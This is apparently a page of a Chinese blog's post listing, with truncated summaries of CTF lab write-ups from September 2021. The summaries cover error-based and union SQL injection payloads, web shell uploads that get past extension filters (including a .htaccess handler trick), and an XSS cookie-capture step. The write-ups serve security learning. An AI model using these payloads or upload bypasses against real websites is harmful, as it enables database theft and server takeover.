上一页 1 2 3 4 5 6 7 ··· 12 下一页
摘要: 1.常规方法测试 2.根据错误信息判断闭合方式为")–+,并且为字符型注入 3.查看当前库 ?id=1") and updatexml(1,concat(0x7e,(database()),0x7e),1)--+ 4.查看库下的所有表88IVGFZVAY ?id=1") and updatexml( 阅读全文
posted @ 2021-09-26 17:23 Nuyoah_QQ 阅读(38) 评论(0) 推荐(0)
摘要: 1.常规方法测试判断注入点 2.爆数据库 ?id=1 and updatexml(1,concat(0x7e,(database()),0x7e),1)--+ 3.查看当前库下的所有表格:ECII73SA8M ?id=1 and updatexml(1,concat(0x7e,(select gro 阅读全文
posted @ 2021-09-26 15:14 Nuyoah_QQ 阅读(31) 评论(0) 推荐(0)
摘要: 1.修改一句话木马文件,后缀名为.pphphp,上传成功 2.链接测试 3.获取flag 阅读全文
posted @ 2021-09-24 17:19 Nuyoah_QQ 阅读(53) 评论(0) 推荐(0)
摘要: 本题的输入次数限制为5 1.判断注入点 2.查看当前库和数据库 ~6YVFTRPF6D~ 3.找列名 ~id,sessid,secret_ZQ3W,tryy~ 4.获取flag ?id=-1' and extractvalue(1,concat(0x7e,(select group_concat(s 阅读全文
posted @ 2021-09-24 17:04 Nuyoah_QQ 阅读(26) 评论(0) 推荐(0)
摘要: 1.常规思路:修改.htaccess文件,上传指定后缀名的一句话,菜刀连接getshell。 蚁剑未能连接成功。 2.使用 PHP passthru()函数 先写一个.htaccess文件上传 <FilesMatch "sj"> //sj随便写的,后面上传的文件没有后缀,就叫sj SetHandle 阅读全文
posted @ 2021-09-24 16:00 Nuyoah_QQ 阅读(309) 评论(0) 推荐(0)
摘要: 1.CTFHub 文件上传 - js前端验证 2.将一句话木马后缀修改成png模式,然后开启抓包,将后缀修改成.php 3.上传成功,蚁剑进入查看flag 4.获得flag 阅读全文
posted @ 2021-09-23 17:34 Nuyoah_QQ 阅读(293) 评论(0) 推荐(0)
摘要: 1.判断注入类型,双引号注入 2. 3.爆表名 阅读全文
posted @ 2021-09-23 15:52 Nuyoah_QQ 阅读(19) 评论(0) 推荐(0)
摘要: 1.无限制上传 2.编写一句话木马 3.上传,使用蚁剑获取路径 阅读全文
posted @ 2021-09-23 11:30 Nuyoah_QQ 阅读(48) 评论(0) 推荐(0)
摘要: 1.第一个输入框与下面Hello后的内容相同,猜测可以通过该输入,改变页面内容。 2.在xss平台注册,新建项目,复制首行 3.获取flag=ctfhub{1e2dd4cbc94b2222a7a8dc78}。 阅读全文
posted @ 2021-09-22 17:45 Nuyoah_QQ 阅读(75) 评论(0) 推荐(0)
摘要: 1.常规方法测试 2.判断注入点 3.爆出相关信息。?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+ 阅读全文
posted @ 2021-09-22 17:26 Nuyoah_QQ 阅读(19) 评论(0) 推荐(0)
上一页 1 2 3 4 5 6 7 ··· 12 下一页